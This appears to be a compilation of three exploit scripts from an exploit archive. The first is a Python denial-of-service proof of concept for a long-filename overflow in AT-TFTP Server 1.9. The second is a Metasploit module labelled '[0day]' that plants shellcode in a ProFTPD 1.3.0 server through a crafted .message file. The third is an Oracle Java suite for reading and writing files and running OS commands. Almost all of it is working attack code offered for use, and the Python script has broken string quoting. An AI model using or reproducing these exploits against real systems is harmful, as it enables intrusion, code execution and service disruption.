Exploit:
#!/usr/bin/python
# SUMMARY:
# AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in TFTP Server AT-TFTP Server
v1.9, which
# could be exploited by remote or local attackers to execute arbitrary
commands
# or cause a denial of service. This flaw is due to a buffer overflow
error when
# handling an overly long file name (more than 227 bytes) passed to a
"GET" or "PUT"
# command, which could be exploited by malicious users to compromise a
vulnerable
# system or crash an affected application.
# EXPLOIT:
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
import socket
import sys
host = '192.168.1.11'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\" + mode + "\"
s.sendto(data, (host, port))
Exploit:
# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
use strict;
package Msf::Exploit::vd_proftpd;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
"Name" => "[0day] ProFTPD 1.3.0 stack overflow",
"Version" => "\$Revision: 1.1 \$",
"Authors" => ["Evgeny Legerov"],
"Arch" => ["x86"],
"OS" => ["linux"],
"Priv" => 1,
"UserOpts" =>
{
"RHOST" => [1, "ADDR", "The target address"],
"RPORT" => [1, "PORT", "The target port", 21],
"USER" => [1, "DATA", "Username", "ftp"],
"PASS" => [1, "DATA", "Password", "ftp123"],
"DIR" => [0, "DATA", "Writeable directory", ""],
},
"Description" => Pex::Text::Freeform(q{
This is a proof of concept exploit for src/support.c:sreplace stack
overflow.
The off-by-one heap overflow bug in proftpd's sreplace function has been
discovered about
2 (two) years ago by Evgeny Legerov. We tried to exploit this off-by-one
bug via MKD command, but failed.
We did not work on this bug since then.
Actually, there are exists at least two bugs in sreplace function,
one is the mentioned off-by-one heap overflow bug the other is stack
overflow
via 'sstrncpy(dst,src,negative argument)'.
We were unable to reach the sreplace stack overflow bug on ProFTPD
1.2.10 stable version,
but the version 1.3.0rc3 introduced some interesting changes, among them:
1. another (integer) overflow in sreplace!
2. now it is possible to reach sreplace stack overflow via pr_display_file!
3. stupid '.message' file display bug
So we decided to choose ProFTPD 1.3.0 as a target for our exploit.
To reach the bug, you need to upload a specially created .message file
to a writeable directory,
then do "CWD <writeable directory>" to trigger the invocation of
sreplace function.
Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display
'.message' file
you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.
The exploit is a part of VulnDisco Pack since Dec 2005.
}),
"Payload" =>
{
"Space" => 900,
"Keys" => ["+bind"],
"BadChars" => "\%\r\n\x00"
},
"DefaultTarget" => 0,
"Targets" =>
[
["ProFTPD 1.3.0 (source install) / Debian 3.1",
# objdump -D proftpd|grep call|grep edx
0x804afc8,
# nm proftpd|grep permanent_pool
0x80b59f8
]
],
"Keys" => ["vd_proftpd"],
};
sub new {
my $class = shift;
return $class->SUPER::new({"Info" => $info, "Advanced" =>
$advanced}, @_);
}
sub Exploit {
my $self = shift;
my $host = $self->GetVar("RHOST");
my $port = $self->GetVar("RPORT");
my $writedir = $self->GetVar("DIR");
my $bind_port = $self->GetVar("LPORT");
my $target = $self->Targets->[$self->GetVar("TARGET")];
my $encodedPayload = $self->GetVar("EncodedPayload");
my $shellcode = $encodedPayload->Payload;
my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host,
"PeerPort" => $port);
if ($sock->IsError) {
$self->PrintLine("Error creating socket: " .
$sock->GetError);
return;
}
my $res = $sock->Recv(-1, 20);
if (!$res) {
$self->PrintLine("The service did not return a valid
banner");
return;
}
$self->PrintLine("Banner: ". $self->CleanData($res));
$sock->Send("USER ". $self->GetVar('USER') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("USER response: ". $self->CleanData($res));
if ($res !~ /^331/) {
$sock->Close;
return;
}
$sock->Send("PASS ". $self->GetVar('PASS') ."\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PASS response: ". $self->CleanData($res));
if ($res !~ /^230/) {
$sock->Close;
return;
}
if (length($writedir) > 0) {
$sock->Send("CWD $writedir\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
}
my $current_dir = "";
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$current_dir = $1 if ($res =~ /257\s\"(.+)\"/);
$current_dir .= "/" if (substr($current_dir, -1, 1) ne "/");
$self->PrintLine("Current directory: $current_dir");
my $dir1 = "A" x (251 - length($current_dir));
$self->PrintLine(sprintf "Dir1 length is %d bytes", length($dir1));
$sock->Send("MKD $dir1\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
$sock->Send("CWD $dir1\r\n");
$res = $sock->Recv(-1,20);
$self->PrintLine("CWD response: " . $self->CleanData($res));
$sock->Send("PWD\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("PWD response: " . $self->CleanData($res));
my $dir2 = "B" x 64;
$dir2 .= pack("V", $target->[1]);
$dir2 .= pack("V", $target->[2] - 4);
$dir2 .= "\xcc" x 28;
$self->PrintLine(sprintf "Dir2 length is %d bytes", length($dir2));
$sock->Send("DELE " . $dir2 . "/.message\r\n");
$sock->Recv(-1, 20);
$sock->Send("DELE " . $dir2 . "/250\r\n");
$sock->Recv(-1, 20);
$sock->Send("RMD $dir2\r\n");
$sock->Recv(-1, 20);
$sock->Send("MKD $dir2\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("MKD response: " . $self->CleanData($res));
# Upload .message file
$sock->Send("TYPE I\r\n");
$sock->Recv(-1, 20);
$sock->Send("PASV\r\n");
$res = $sock->Recv(-1, 20);
if ($res !~ /^227/) {
$self->PrintLine("Incorrect response to PASV command: " .
$self->CleanData($res));
return;
}
$self->PrintLine("PASV response: " . $self->CleanData($res));
$res =~ /\((\d+)\,(\d+),(\d+),(\d+),(\d+),(\d+)/;
my $datahost = "$1.$2.$3.$4";
my $dataport = (int($5) << 8) + int($6);
$self->PrintLine("Opening connection to $datahost:$dataport");
my $datasock = Msf::Socket::Tcp->new("PeerAddr" => $datahost,
"PeerPort" => $dataport);
if ($datasock->IsError) {
$self->PrintLine("Error creating socket: " .
$datasock->GetError);
return;
}
$sock->Send("STOR $dir2/.message\r\n");
$res = $sock->Recv(-1, 20);
$self->PrintLine("STOR response: " . $self->CleanData($res));
my $filedata = "";
$filedata .= "A";
$filedata .= "\x66\x81\xc2\x5e\x13\x52\xc3"; # add $0x135e, %dx;
push %edx; ret
$filedata .= "\%C" x 11;
$filedata .= "A";
$filedata .= $shellcode;
$filedata .= "A" x (900 - length($shellcode));
$filedata .= "\%CA" x 10;
$datasock->Send($filedata);
$datasock->Close();
$res = $sock->Recv(-1, 20);
$self->PrintLine("FILE transfered: " . $self->CleanData($res));
# Trigger sreplace overflow
$sock->Send("CWD $dir2\r\n");
$sock->Recv(-1,20);
sleep(3);
$sock->Close();
}
sub CleanData {
my $self = shift;
my $data = shift;
$data =~ s/\r|\n//g;
return $data;
}
Exploit:
-- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $
--
-- raptor_oraexec.sql - java exploitation suite for oracle
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
--
-- This is an exploitation suite for Oracle written in Java. Use it to
-- read/write files and execute OS commands with the privileges of the
-- RDBMS, if you have the required permissions (DBA role and SYS:java).
--
-- "The Oracle RDBMS could almost be considered as a shell like bash or the
-- Windows Command Prompt; it's not only capable of storing data but can
also
-- be used to completely access the file system and run operating system
-- commands" -- David Litchfield (http://www.databasesecurity.com/)
--
-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r-- 1 oracle system 45 Nov 22 12:20 mytest
-- -rw-r--r-- 1 oracle system 1645 Nov 22 12:20 aaa
-- -rw-r--r-- 1 oracle system 8267 Nov 22 12:20 bbb
-- [...]
--
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
/*
* Command execution module
*/
public static void execCommand(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
/*
* File reading module
*/
public static void readFile(String filename) throws IOException
{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module
*/
public static void writeFile(String filename, String line) throws
IOException
{
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
/
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';
/
-- usage: exec dbms_java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
/
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line
in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
/